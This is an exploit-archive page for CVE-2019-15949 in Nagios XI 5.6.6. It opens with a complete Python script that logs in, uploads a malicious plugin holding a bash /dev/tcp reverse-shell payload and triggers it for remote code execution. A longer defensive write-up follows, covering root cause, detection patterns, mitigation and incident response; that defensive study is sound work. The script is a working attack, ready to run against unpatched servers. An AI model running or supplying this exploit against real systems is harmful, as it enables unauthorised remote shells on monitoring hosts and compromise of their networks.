Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

Exploit Author: Calil Khalil Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-04-08 
# Exploit Title: Nagiosxi authenticated Remote Code Execution
# Date: 17/02/2024
# Exploit Author: Calil Khalil
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios Xi 5.6.6
# Tested on: Ubuntu
# CVE : CVE-2019-15949

#
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
#

import argparse
import re
import requests
import urllib3

class Nagiosxi():
    def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
        self.url = target
        self.parameter = parameter
        self.username = username
        self.password = password
        self.lhost = lhost
        self.lport = lport
        self.ignore_ssl = ignore_ssl
        self.login()

    def upload(self, session):
        print("Uploading Malicious Check Ping Plugin")
        upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
        upload_token = session.get(upload_url, verify=not self.ignore_ssl)
        nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
        print("Upload NSP Token: " + nsp[0])
        payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
        file_data = {
                "upload": "1",
                "nsp": nsp[0],
                "MAX_FILE_SIZE": "20000000"
                }
        file_upload = {
                "uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
                }
        session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
        payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
        session.get(payload_url, verify=not self.ignore_ssl)

    def login(self):
        session = requests.Session()
        login_url = self.url + self.parameter + "/login.php"
        token = session.get(login_url, verify=not self.ignore_ssl)
        nsp = re.findall('name="nsp" value="(.*)">', token.text)
        print("Login NSP Token: " + nsp[0])
        post_data = {
                "nsp": nsp[0],
                "page": "auth",
                "debug": "",
                "pageopt": "login",
                "redirect": "",
                "username": self.username,
                "password": self.password,
                "loginButton": ""
        }
        login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
        if "Home Dashboard" in login.text:
            print("Logged in!")
        else:
            print("Unable to login!")
        self.upload(session)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution')
    parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
    parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
    parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
    parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
    parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
    parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
    parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
    args = parser.parse_args()


    urllib3.disable_warnings()

    try:
        print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
        Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
    except KeyboardInterrupt:
        print("\nBye Bye!")
        exit()


Nagios XI 5.6.6 — Authenticated Remote Code Execution (CVE-2019-15949)

This article explains the authenticated remote code execution (RCE) vulnerability tracked as CVE-2019-15949 affecting Nagios XI 5.6.6. It covers the vulnerability background, technical root cause at a high level, detection and indicators of compromise (IoCs), mitigation and hardening guidance, and incident response steps — all written for defenders, system administrators, and security engineers.

Summary & impact

CVE-2019-15949 is an authenticated RCE in Nagios XI 5.6.6 that allows an attacker with valid credentials and access to the Nagios XI web UI to upload a crafted monitoring plugin or file that can be executed on the server. Successful exploitation can lead to arbitrary command execution with the privileges of the Nagios service account and may result in system compromise, lateral movement, data exfiltration, or persistent backdoors.

VulnerabilityAuthenticated remote code execution via plugin upload/processing
CVECVE-2019-15949
Affected versionNagios XI 5.6.6 (and earlier deployments not patched by vendor updates)
Attack vectorAuthenticated — requires valid Nagios XI user account with access to plugin upload functionality
ImpactRemote command execution, potential full server compromise depending on privileges

High-level technical root cause

  • Insufficient validation and sanitization of uploaded plugin artifacts and/or parameters used when triggering plugin download/execution.
  • Web application endpoints that accept file uploads or file-related commands and then perform server-side operations (such as storing and later invoking plugin files) without robust input validation, safe file handling, or strict access controls.
  • Lack of appropriate runtime restrictions (for example, executing uploaded content in an isolated environment, using secure file permissions, or enforcing execution policies).

Conceptual attack flow (non-actionable)

This is a conceptual description only — it intentionally avoids exploit code or step‑by‑step instructions.

  • An authenticated user accesses the plugin-management UI.
  • The user uploads a crafted file that the application accepts as a plugin or monitoring component.
  • Later, the application processes or makes that uploaded file available to the server execution path (for instance, via a download/execute endpoint) without sufficient validation.
  • As a result, attacker-supplied content is interpreted/executed on the server, enabling command execution under the application's privileges.

Pseudocode (non-exploitable) illustrating the vulnerable pattern

// Vulnerable pattern (conceptual, non-executable)
receive_upload(request):
    // accept file upload from authenticated user
    file = request.files['uploadedfile']
    // naive storage: write raw contents to plugins dir
    save("/var/nagios/plugins/" + file.filename, file.contents)
    // later, server or admin interface triggers execution of files in plugins dir
    execute("/var/nagios/plugins/" + file.filename)

Explanation: This pseudocode demonstrates the unsafe pattern of directly saving user-supplied content into an executable location and later executing it without validation or sandboxing. It is intentionally generic and does not provide an exploit or actionable payload.

Secure design principles and corrected example (pseudo)

// Safer approach (conceptual)
receive_upload(request):
    if not user_has_upload_privileges(request.user):
        reject()
    file = request.files['uploadedfile']
    if not allowed_file_type(file):
        reject()
    // sanitize filename and treat uploaded content as data, not executable
    stored_path = store_in_quarantine(file)
    // perform offline validation (scan for malicious patterns, verify signature)
    if content_approved(stored_path):
        move_to_non-executable_repository(stored_path)
        // register plugin metadata; require explicit admin approval to enable execution
    else:
        delete(stored_path)
        alert_admin()

Explanation: The corrected pseudocode demonstrates defensive controls: privilege checks, file type whitelisting, filename sanitization, quarantine and scanning, explicit admin approval before enabling execution, and storing artifacts in non-executable locations. These reduce the risk of uploaded content being executed directly.

Detection and Indicators of Compromise (IoCs)

Monitor for anomalous activity related to plugin upload endpoints and unexpected outbound connections originating from the Nagios server.

  • Unusual POST requests to admin upload endpoints (for example, requests to monitoringplugins.php containing multipart uploads).
  • Requests to endpoints that trigger downloads or profile actions with unexpected query parameters (example pattern: profile.php?cmd=download).
  • New or unexpected files in plugin or web directories: /usr/local/nagios/, /usr/local/nagiosxi/, /var/nagios/plugins/ or similar locations.
  • Outbound network connections from the Nagios host to unfamiliar IPs/ports, especially reverse-shell style connections (unusual TCP to random high ports).
  • Suspicious process executions from Nagios account (processes running interpreters such as bash, perl, python initiated by the Nagios service user).
  • Authentication anomalies: new or unexpected administrative accounts, frequent failed login attempts followed by a successful upload.

Example detection rules (safe, non-actionable)

Use these as templates for SIEM / WAF rules to detect potentially malicious upload activity. They detect suspicious HTTP requests and file placements rather than giving exploitation details.

// Example: Web server access log detection (pseudo-SQL for SIEM)
SELECT * FROM http_access_logs
WHERE request_method = 'POST'
  AND request_uri LIKE '%/admin/monitoringplugins.php%'
  AND user_agent IS NOT NULL
  AND response_status = 200
  AND bytes_sent > 1000;

Explanation: This query identifies POST requests to the plugin upload endpoint. It can be refined with file-size thresholds or by inspecting multipart form fields if your logging captures them.


// Example: Regex to flag suspicious URL patterns in web logs
/monitoringplugins\.php.*(upload|uploadedfile)|profile\.php\?cmd=download/i

Explanation: This regular expression can be used in IDS/WAF rules to highlight requests referencing known upload or download-related endpoints. Tune and test in your environment to limit false positives.

Mitigation and remediation steps

  • Apply vendor updates: Install the official Nagios XI security updates or upgrade to a non-vulnerable supported version. Vendor advisories and CVE patches are the primary remediation.
  • Limit upload privileges: Restrict plugin upload and administrative UI access to the smallest set of trusted users. Enforce strong authentication and role-based access control.
  • Harden the web interface: Deploy two-factor authentication for Nagios XI administrative accounts and isolate administrative interfaces behind VPN or management network segments.
  • File system hardening: Ensure uploaded files are stored outside executable paths, set strict file permissions, and run Nagios services with least privilege (non-root account). Use chroot or containerization where feasible.
  • Use network controls: Block or restrict outbound internet access from monitoring servers unless explicitly required. Monitor and restrict egress to prevent callback connections.
  • Deploy WAF/IDS rules: Add rules to block suspicious uploads and to detect access patterns described above. Use signatures to flag attempts to call download endpoints with unusual parameters.
  • Scan for compromise: After patching, hunt for webshells and unauthorized files, check for new cron jobs, SSH keys, and unexpected user accounts; review logs for suspicious activity.
  • Credentials rotation: Rotate administrator and service account credentials if compromise is suspected.

Incident response checklist

  • Isolate affected systems from the network (if active exploitation is suspected) to prevent lateral movement and data exfiltration.
  • Preserve forensic evidence: collect web server logs, system logs, process lists, file timestamps, and copies of suspicious files for analysis.
  • Identify scope: enumerate all uploads, check plugin folders, and search for recently modified or newly created files.
  • Assess persistence: look for webshells, scheduled tasks, SSH authorized_keys, and backdoor services.
  • Remediate: remove malicious files, apply vendor patch, and rebuild systems if necessary to ensure integrity.
  • Post-incident: implement monitoring, patch management, and control changes to reduce likelihood of re‑occurrence; document lessons learned.

Hardening recommendations and long-term controls

  • Enforce strict role-based access control (RBAC) and MFA for all administrative interfaces.
  • Ensure continuous patch management: subscribe to vendor advisories and CVE feeds for timely updates.
  • Use application allowlists for executable directories; don't permit arbitrary uploaded content to be executable.
  • Isolate monitoring infrastructure from general-purpose hosts; limit lateral network access from monitoring servers.
  • Use runtime protections: SELinux / AppArmor profiles, containerization, and process monitoring to limit impact of any execution.
  • Regularly scan and pentest the deployment to discover insecure upload handling or other web‑app logic flaws before attackers do.

References and further reading

  • Vendor advisories and product documentation from Nagios for Nagios XI security updates.
  • CVE-2019-15949 — details in vulnerability databases (search by CVE identifier for timeline and CVSS score).
  • Application security guidance on secure file upload handling and input validation.
  • Center for Internet Security (CIS) and vendor hardening checklists for host and web application configuration.